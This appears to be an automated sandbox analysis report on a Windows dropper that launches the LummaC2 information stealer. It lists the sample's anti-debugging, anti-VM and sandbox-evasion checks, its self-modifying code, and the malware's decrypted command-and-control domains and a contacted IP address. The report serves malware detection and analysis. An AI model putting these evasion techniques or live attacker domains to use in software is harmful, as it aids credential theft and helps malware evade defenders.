Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB1D9D second address: EB1DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB0E8BCBF7Ah 0x0000000c jmp 00007FB0E8BCBF70h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FB0E8BCBF6Dh 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB2062 second address: EB2077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB0E8BCBD06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f js 00007FB0E8BCBD06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24A3 second address: EB24A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24A9 second address: EB24B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24B2 second address: EB24B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24B8 second address: EB24BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24BC second address: EB24D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF76h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24D6 second address: EB24E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB24E1 second address: EB24EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB0E8BCBF66h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB262D second address: EB2633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB640A second address: EB6430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB0E8BCBF6Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB0E8BCBF6Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB6430 second address: EB6434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EB60C9 second address: EB60DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnl 00007FB0E8BCBF66h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC206 second address: EBC20A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC20A second address: EBC210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC210 second address: EBC21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FB0E8BCBD06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC0C1 second address: EBC0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC0D9 second address: EBC0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC0DD second address: EBC0E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EBC0E3 second address: EBC0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EC4EE8 second address: EC4EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EC4EF0 second address: EC4EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED145E second address: ED146C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB0E8BCBF66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED146C second address: ED1479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED1479 second address: ED147D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED112E second address: ED1156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB0E8BCBD19h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED1156 second address: ED115F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED115F second address: ED1167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED834B second address: ED8351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: ED890A second address: ED891A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FB0E8BCBD0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDB7C7 second address: EDB7DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF73h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDB7DE second address: EDB7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 jmp 00007FB0E8BCBD0Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEE82 second address: EDEE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEE88 second address: EDEED0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0E8BCBD06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jns 00007FB0E8BCBD06h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jne 00007FB0E8BCBD08h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FB0E8BCBD0Ah 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB0E8BCBD18h 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDE88B second address: EDE896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDE896 second address: EDE8A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD0Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDE8A9 second address: EDE8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB0E8BCBF66h 0x0000000a jmp 00007FB0E8BCBF6Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDE8BE second address: EDE8D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE2A4F second address: EE2A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE88CD second address: EE88D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE841B second address: EE842F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF70h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE842F second address: EE8433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE8433 second address: EE8439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EE8439 second address: EE843F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EEA4C2 second address: EEA4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EEA4CB second address: EEA4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB0E8BCBD06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EEA4D7 second address: EEA4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB0E8BCBF66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEA25 second address: EDEA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0E8BCBD11h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEA3C second address: EDEA40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEA40 second address: EDEA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDEA46 second address: EDEA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: EDFCAB second address: EDFCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\3stIhG821a.exe	Special instruction interceptor: First address: C4DD10 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3stIhG821a.exe	Special instruction interceptor: First address: DF6F30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3stIhG821a.exe	Special instruction interceptor: First address: E02A14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3stIhG821a.exe	Special instruction interceptor: First address: E8E40C instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\3stIhG821a.exe	Memory allocated: 5610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Memory allocated: 57D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Memory allocated: 77D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe TID: 6880

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 3stIhG821a.exe, 3stIhG821a.exe, 00000000.00000002.1769340948.0000000000DDA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 3stIhG821a.exe, 00000000.00000003.1727950224.0000000005450000.00000004.00001000.00020000.00000000.sdmp, 3stIhG821a.exe, 00000000.00000002.1768675449.0000000000572000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: 3stIhG821a.exe, 00000000.00000002.1768675449.0000000000572000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: vmware
Source: 3stIhG821a.exe, 3stIhG821a.exe, 00000000.00000003.1727950224.0000000005450000.00000004.00001000.00020000.00000000.sdmp, 3stIhG821a.exe, 00000000.00000002.1768675449.0000000000572000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000002.00000003.1761573299.0000000001DD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: 3stIhG821a.exe, 00000000.00000002.1769340948.0000000000DDA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Set-up.exe, 00000002.00000000.1734839398.0000000000FC1000.00000020.00000001.01000000.00000008.sdmp	Binary or memory string: t>hGfS
Source: Set-up.exe, 00000002.00000003.1761227853.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Set-up.exe, 00000002.00000002.1950327711.0000000003F4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1948291830.0000000003EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_1-12914

Source: C:\Users\user\Desktop\3stIhG821a.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\3stIhG821a.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\3stIhG821a.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\3stIhG821a.exe	File opened: NTICE
Source: C:\Users\user\Desktop\3stIhG821a.exe	File opened: SICE
Source: C:\Users\user\Desktop\3stIhG821a.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\3stIhG821a.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_009FBAD0 LdrInitializeThunk,

1_2_009FBAD0

Source: C:\Users\user\Desktop\3stIhG821a.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000067D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: 3stIhG821a.exe, 3stIhG821a.exe, 00000000.00000002.1769340948.0000000000DDA000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: J1Program Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
